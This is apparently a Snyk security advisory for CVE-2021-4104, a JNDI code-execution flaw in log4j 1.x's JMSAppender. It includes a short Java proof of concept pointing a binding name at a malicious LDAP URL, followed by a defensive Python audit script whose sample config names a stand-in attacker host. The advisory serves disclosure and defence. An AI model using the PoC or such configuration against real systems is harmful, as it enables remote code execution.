Arbitrary Code Execution Affecting org.zenframework.z8.dependencies.commons:log4j-1.2.17 package, versions [0,]


Severity

medium (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of concept
EPSS: 15.91% (97th percentile)

  • Snyk ID: SNYK-JAVA-ORGZENFRAMEWORKZ8DEPENDENCIESCOMMONS-5922119
  • Published: 13 Dec 2021
  • Disclosed: 10 Dec 2021
  • Credit: Unknown

Introduced: 10 Dec 2021

CVE-2021-4104
CWE-94

How to fix?

There is no fixed version for org.zenframework.z8.dependencies.commons:log4j-1.2.17.

Overview

Affected versions of this package are vulnerable to Arbitrary Code Execution.
Note: Although this vulnerability appears to be related to the log4j 2.x vulnerability, the 1.x branch of the module is only exploitable when an attacker is already able to modify its configuration, which is rarely possible.

In order to leverage this vulnerability the following conditions must be met:

  1. The application has enabled JMSAppender (or a class that extends JMSAppender)
  2. The attacker has access to directly modify the TopicBindingName or TopicConnectionFactoryBindingName configuration variables - which is an unlikely scenario

If these conditions are met, log4j 1.x performs a JNDI lookup on these names without protecting against attacker-controlled LDAP and other JNDI endpoints. An attacker who controls the aforementioned configuration variables can therefore have a remote object loaded from an LDAP server and arbitrary code executed.

PoC

import org.apache.log4j.net.JMSAppender;
// ...
JMSAppender a = new JMSAppender();
// Either binding name is passed to JNDI unvalidated; a URL-form name selects a remote provider.
a.setTopicConnectionFactoryBindingName("ldap://<malicious-url>");
// OR a.setTopicBindingName("ldap://<malicious-url>");
// activateOptions() performs the JNDI lookups, which triggers the remote fetch.
a.activateOptions();
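As a defender-side check for the two conditions listed above, the following added example (not part of the Snyk advisory or of log4j) audits a log4j 1.x properties file for a JMSAppender attached to a logger and for a TopicBindingName or TopicConnectionFactoryBindingName carrying a remote URL scheme. The sample configuration, the hostname in it and the function names are constructed for illustration.

```python
import re
# Constructed sample log4j 1.x properties file (not from the advisory).
SAMPLE_CONFIG = """\
log4j.rootLogger=INFO, jms
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.TopicConnectionFactoryBindingName=ConnectionFactory
log4j.appender.jms.TopicBindingName=ldap://attacker.example/x
"""
JMS_APPENDER = "org.apache.log4j.net.JMSAppender"
JNDI_PROPS = ("TopicBindingName", "TopicConnectionFactoryBindingName")
# A JNDI name carrying a URL scheme (ldap://, rmi://, ...) is resolved by a remote provider.
REMOTE_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")

def parse_properties(text):
    """Minimal java.util.Properties reader: key, then the first '=' or ':' separator."""
    props = {}
    for line in (ln.strip() for ln in text.splitlines()):
        if line and line[0] not in "#!":
            parts = re.split(r"\s*[=:]\s*", line, maxsplit=1)
            props[parts[0]] = parts[1] if len(parts) > 1 else ""
    return props

def attached_appenders(props):
    """Map appender name -> logger key (rootLogger or log4j.logger.*) that references it."""
    attached = {}
    for key, value in props.items():
        if key == "log4j.rootLogger" or key.startswith("log4j.logger."):
            tokens = [t.strip() for t in value.split(",") if t.strip()]
            if not value.startswith(","):  # first token is the level, as PropertyConfigurator reads it
                tokens = tokens[1:]
            for name in tokens:
                attached.setdefault(name, key)
    return attached

def audit_log4j1_config(text):
    """Report the CVE-2021-4104 preconditions present in a log4j 1.x properties config."""
    props = parse_properties(text)
    attached = attached_appenders(props)
    findings = []
    for key, cls in props.items():
        m = re.fullmatch(r"log4j\.appender\.([^.]+)", key)
        if not m or cls != JMS_APPENDER:  # subclasses of JMSAppender are not caught by class name
            continue
        where = attached.get(m.group(1), "no logger")  # condition 1: JMSAppender enabled on a logger
        findings.append(("medium", f"appender '{m.group(1)}' is {JMS_APPENDER} (attached: {where})"))
        for prop in JNDI_PROPS:  # condition 2: a binding name that points at a remote endpoint
            value = props.get(f"{key}.{prop}", "")
            if REMOTE_NAME.match(value):
                findings.append(("high", f"{key}.{prop} is a remote JNDI name: {value}"))
    return findings
```

Run it over each log4j.properties in a deployment; an exact class match misses subclasses, so the "high" finding on a remote binding name is the one to act on first.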

CVSS Scores (version 3.1)